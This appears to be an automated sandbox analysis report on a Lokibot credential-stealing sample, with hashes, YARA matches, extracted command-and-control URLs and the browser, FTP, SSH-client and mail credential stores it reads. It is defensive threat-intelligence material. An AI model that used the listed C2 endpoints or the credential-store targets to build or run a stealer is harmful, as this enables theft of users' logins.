Loading ...

Play interactive tourEdit tour

Analysis Report unpacked.bin

Overview

General Information

Sample Name:unpacked.bin (renamed file extension from bin to exe)
Analysis ID:431544
MD5:1917f888cacd48b9a8d4832449e8d34f
SHA1:d732e6a78ea44b77943c1e74e19c9ea92d0b7a28
SHA256:3deeb55fefe05f51c41b1724780e5de1e33a432e01f455e3ab5d2af5ca655464
Tags:exelokibot
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • unpacked.exe (PID: 6916 cmdline: 'C:\Users\user\Desktop\unpacked.exe' MD5: 1917F888CACD48B9A8D4832449E8D34F)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
unpacked.exeSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x13e80:$s2: https://
  • 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
unpacked.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    unpacked.exeJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      unpacked.exeJoeSecurity_LokibotYara detected LokibotJoe Security
        unpacked.exeLoki_1Loki Payloadkevoreilly
        • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x13ffc:$a2: last_compatible_version
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
              00000000.00000000.643480909.0000000000415000.00000002.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000000.643480909.0000000000415000.00000002.00020000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                  Click to see the 4 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.2.unpacked.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.2.unpacked.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                      0.2.unpacked.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                        0.2.unpacked.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
                        • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                        • 0x13ffc:$a2: last_compatible_version
                        0.2.unpacked.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                        • 0x12fff:$des3: 68 03 66 00 00
                        • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                        • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                        Click to see the 6 entries

                        Sigma Overview

                        No Sigma rule has matched

                        Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus / Scanner detection for submitted sampleShow sources
                        Source: unpacked.exeAvira: detected
                        Found malware configurationShow sources
                        Source: 00000000.00000000.643480909.0000000000415000.00000002.00020000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                        Multi AV Scanner detection for domain / URLShow sources
                        Source: firenzelavori.ltVirustotal: Detection: 10%Perma Link
                        Source: https://firenzelavori.lt/loki/Panel/five/fre.phpVirustotal: Detection: 9%Perma Link
                        Machine Learning detection for sampleShow sources
                        Source: unpacked.exeJoe Sandbox ML: detected
                        Source: unpacked.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74

                        Networking:

                        barindex
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                        Source: unknownDNS traffic detected: query: firenzelavori.lt replaycode: Server failure (2)
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_00404ED4 recv,0_2_00404ED4
                        Source: unknownDNS traffic detected: queries for: firenzelavori.lt
                        Source: unpacked.exeString found in binary or memory: http://www.ibsensoftware.com/
                        Source: unpacked.exe, 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmpString found in binary or memory: https://firenzelavori.lt/loki/Panel/five/fre.php

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)Show sources
                        Source: unpacked.exe, type: SAMPLEMatched rule: Loki Payload Author: kevoreilly
                        Source: unpacked.exe, type: SAMPLEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.unpacked.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.unpacked.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.0.unpacked.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.0.unpacked.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_0040549C0_2_0040549C
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_004029D40_2_004029D4
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: String function: 0041219C appears 45 times
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: String function: 00405B6F appears 41 times
                        Source: unpacked.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: unpacked.exe, type: SAMPLEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                        Source: unpacked.exe, type: SAMPLEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: unpacked.exe, type: SAMPLEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.unpacked.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.unpacked.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.0.unpacked.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                        Source: 0.0.unpacked.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.0.unpacked.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/2@157/0
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_0040650A
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,0_2_0040434D
                        Source: C:\Users\user\Desktop\unpacked.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                        Source: unpacked.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\unpacked.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

                        Data Obfuscation:

                        barindex
                        Yara detected aPLib compressed binaryShow sources
                        Source: Yara matchFile source: unpacked.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.643480909.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: unpacked.exe PID: 6916, type: MEMORY
                        Source: Yara matchFile source: 0.2.unpacked.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.unpacked.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: unpacked.exeStatic PE information: section name: .x
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AD4
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AFC
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exe TID: 6920Thread sleep time: -1500000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\unpacked.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74
                        Source: C:\Users\user\Desktop\unpacked.exeThread delayed: delay time: 60000Jump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]0_2_0040317B
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,0_2_00402B7C
                        Source: C:\Users\user\Desktop\unpacked.exeProcess token adjusted: DebugJump to behavior
                        Source: unpacked.exe, 00000000.00000002.908028408.0000000000E20000.00000002.00000001.sdmpBinary or memory string: Program Manager
                        Source: unpacked.exe, 00000000.00000002.908028408.0000000000E20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                        Source: unpacked.exe, 00000000.00000002.908028408.0000000000E20000.00000002.00000001.sdmpBinary or memory string: Progman
                        Source: unpacked.exe, 00000000.00000002.908028408.0000000000E20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: 0_2_00406069 GetUserNameW,0_2_00406069
                        Source: C:\Users\user\Desktop\unpacked.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected LokibotShow sources
                        Source: Yara matchFile source: unpacked.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.643480909.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: unpacked.exe PID: 6916, type: MEMORY
                        Source: Yara matchFile source: 0.2.unpacked.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.unpacked.exe.400000.0.unpack, type: UNPACKEDPE
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\unpacked.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\unpacked.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Tries to harvest and steal ftp login credentialsShow sources
                        Source: C:\Users\user\Desktop\unpacked.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                        Tries to steal Mail credentials (via file access)Show sources
                        Source: C:\Users\user\Desktop\unpacked.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\Desktop\unpacked.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                        Tries to steal Mail credentials (via file registry)Show sources
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: PopPassword0_2_0040D069
                        Source: C:\Users\user\Desktop\unpacked.exeCode function: SmtpPassword0_2_0040D069
                        Source: Yara matchFile source: unpacked.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.643480909.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: unpacked.exe PID: 6916, type: MEMORY
                        Source: Yara matchFile source: 0.2.unpacked.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.unpacked.exe.400000.0.unpack, type: UNPACKEDPE

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Security Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection1Virtualization/Sandbox Evasion11Credentials in Registry2Process Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerVirtualization/Sandbox Evasion11SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
